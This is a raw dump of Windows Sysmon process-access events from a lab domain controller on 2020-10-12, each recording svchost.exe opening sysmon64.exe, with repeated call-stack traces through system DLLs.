08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 